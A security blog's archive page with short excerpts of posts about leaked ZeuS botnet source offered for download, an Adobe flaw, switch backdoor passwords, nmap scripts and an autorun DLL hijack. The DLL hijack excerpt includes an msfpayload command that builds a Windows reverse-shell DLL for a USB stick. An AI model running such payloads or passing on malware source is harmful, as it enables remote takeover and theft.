If you’d like to take a look at the ZeuS/SpyEye botnet source code and see how it ticks, you can download it below. I’m not sure how long this will be up (for obvious reasons), so get it while it’s hot. ZeuS 2.0.8.9 Enjoy.. PS – I am in no way responsible for the use [...]
Archive for the ‘code’ Category
ZeuS source code, anyone?
Posted: 12th May 2011 by Matt in codeTags: botnet, code, download, example, leak, ZeuS
6
Geolocation Using BSSID
Posted: 22nd September 2010 by Matt in code, hacks, news, securityTags: attack, BSSID, DefCon, demo, Geolocation, GPS, mac, Skyhook, SSID, war, WiFi
This was discussed at DefCon 18 in a talk by Sammy Kamkar, but as far as I know, Sammy didn’t release his code, so I had to come up with something on my own. First, one big difference. His version of this uses the Google Location Services API. I’ve opted to use the Skyhook service [...]
Really, Adobe?
Posted: 20th September 2010 by Matt in code, hacks, news, securityTags: 0day, Acrobat, Adobe, cooltype, corporate, dll, exploitation, information, own, PDF, penetration, SING, software, strncat, SumatraPDF, vulnerability, Xpdf
So, I’ve come across a lot more information regarding the no-longer-0day Adobe vulnerability (oh, wait, that’s right.. there have been like, 12 in the last 30 days.. I’m referring just to the SING table one). Anyway, a penetration testing company named Ramz Afzar has released an unofficial patch to fix the Adobe vulnerability, because apparently [...]
0day “Here you have” Worm – Prevention at the Gateway
Posted: 10th September 2010 by Matt in code, hacks, news, securityTags: gateway, infect, INPUTMSG, mimedefang, perl, Prevention, protect, rule, rules, script, sendmail, spam, virus, worm
“…that we all feared might happen someday…”? Where has this chick been? ANYWAY….. Whenever I hear about an email worm going around an infecting people left and right, I kind of chuckle to myself. These are absurdly easy to block, yet no one seems to do it. I’m in charge of all the network operations [...]
Backdoor Password in Accton Based Switches
Posted: 2nd September 2010 by Matt in code, hacks, securityTags: Accton, Accton-based, backdoor, concept, Dell PowerConnect, EdgeCore, Edwin Eefting, Erik Smit, Erwin Drent, exploit, firmware, Foundry, passwords, perl, PoC, proof, SNMP, vulnerability
This just came across and it’s pretty interesting. I haven’t heard of/seen this before, so I figured I’d repost it here. I don’t usually like to regurgitate stuff, but if I have nothing to write myself and I come across something that I consider to be valuable, interesting, insightful, or whatever, I will. [BEGIN REGURGITATION [...]
Autorun DLL Hijacker (USB stick)
Posted: 26th August 2010 by Matt in code, hacks, securityTags: 0day, autorun, dll, exploit, hack, hijacker, Hijacking, network security audit, USB, vulnerability
I decided that it might be useful to be able to utilize DLL hijacking with Autorun.. here’s the outcome. # msfpayload windows/shell/reverse_tcp LHOST=192.168.0.58 D > /media/KINGSTON/wab32res.dll Created by msfpayload (http://www.metasploit.com). Payload: windows/shell/reverse_tcp Length: 290 Options: LHOST=192.168.0.58
Favorite nmap NSE scripts
Posted: 25th August 2010 by Matt in code, hacks, securityTags: Administrator, attack, brute force, dns-zone-transfer, dnszonetransfer, enum, Enumeration, hack, http-enum, MS08-067, nmap, nse, nsedoc, scripts, smb-brute, smb-check-vulns, smb-enum-users, snmp-netstat, snmp-processes, snmp-win32-services, snmp-win32-shares, snmp-win32-users, transfer, vulnerability
I cannot say enough good things about NSE (Nmap Scripting Engine). I’ve written a couple of posts about it and why I find it so useful, but in this post I’m going to cover some of my favorite scripts that come with the most recent Nmap release (5.35 DC1 (The DefCon release.. oooh. ). The [...]